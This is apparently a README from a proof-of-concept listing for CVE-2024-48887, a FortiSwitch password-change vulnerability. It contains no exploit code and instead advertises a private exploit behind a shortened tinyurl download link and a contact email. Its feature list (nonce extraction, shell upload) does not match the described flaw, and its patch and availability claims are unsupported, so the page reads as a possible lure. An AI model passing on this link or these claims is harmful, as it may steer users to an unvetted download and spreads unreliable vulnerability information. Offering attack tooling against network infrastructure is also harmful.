CVE-2024-48887 PoC — Fortinet FortiSwitch 安全漏洞

Source

Associated Vulnerability

Description

Unverified Password Change (CWE-620)

Readme

# CVE-2024-48887-Unverified Password Change (CWE-620)
## Overview
An unverified password change vulnerability in Fortinet FortiSwitch GUI that allows a remote unauthenticated attacker to change admin passwords via a specially crafted request

## Exploit:
## [Download here](https://tinyurl.com/rxmjnfn7)
## Details
+ **CVE ID**: CVE-2024-48887

+ **Published**: 04/08/2025

+ **Impact**: Critical
+ **Exploit Availability**: Not public, only private.
+ **CVSS**: 9.8
+ **Patch Available:  (No official patch yet)**
## Impact
This critical vulnerability enables an external attacker to completely compromise administrative access to Fortinet FortiSwitch devices without requiring any authentication. An attacker could: - Arbitrarily change admin passwords - Potentially gain full control of the network switch - Bypass existing security controls - Compromise network infrastructure integrity and availability

## Exploit Features
+ ✅ Automated Exploitation – Extracts nonce, logs in, and uploads the shell automatically.
+ ✅ Version Check – Confirms if the target is vulnerable before exploitation.
+ ✅ Error Handling – Ensures smooth execution even in case of failures.
+ ✅ Session Handling – Uses persistent session management for authentication.
+ ✅ Real-time Feedback – Provides output at each step.




## Contact
+ **For inquiries, please contact:*nowkie221@outlook.com*
+ **Exploit** :[Download here](https://tinyurl.com/rxmjnfn7)

File Snapshot

 [4.0K]  /data/pocs/500fe52fbc24f1073e9921effdcad9f2437a18d0
└── [1.4K]  README.md

0 directories, 1 file

Remarks